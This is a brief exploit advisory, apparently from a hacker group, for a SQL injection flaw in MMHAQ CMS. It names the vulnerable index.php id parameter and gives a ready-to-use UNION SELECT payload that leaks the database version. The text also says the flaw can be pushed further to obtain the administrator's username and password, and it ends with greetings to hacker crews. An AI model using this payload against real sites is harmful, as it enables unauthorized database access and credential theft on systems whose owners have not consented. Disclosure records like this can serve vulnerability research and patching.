MMHAQ CMS sqli vulnersbility
[+]Title: MMHAQ CMS sqli vulnersbility
[+]Version: only one version is released
[+]Download: http://www.mmhaq.net/index.php?page=pack_linux
[+]Contact: s1ayer.icw@gmail.com
MMHAQ CMS fully functional Content Management System in PHP on top of MySQL.
Including articles, news, file management and all of the general functionalities of a CMS.
It is completely accessible and very easy to use on a daily basis.
#[Exploit] :
[Bug] = index.php?id=SQL]
[SQL] = -1%20union%20all%20select%201,version(),3,4,5,6--
#[Demo] :
Explanation:Version of the database can be seen at the title bar of the browser, this exploit can be further exploited to gain the user id and password of the admin.
GREETZ: r45c4l,b0nd,sai,sm4rt,fb1,jappan, and all ICW and andhrhahackers members.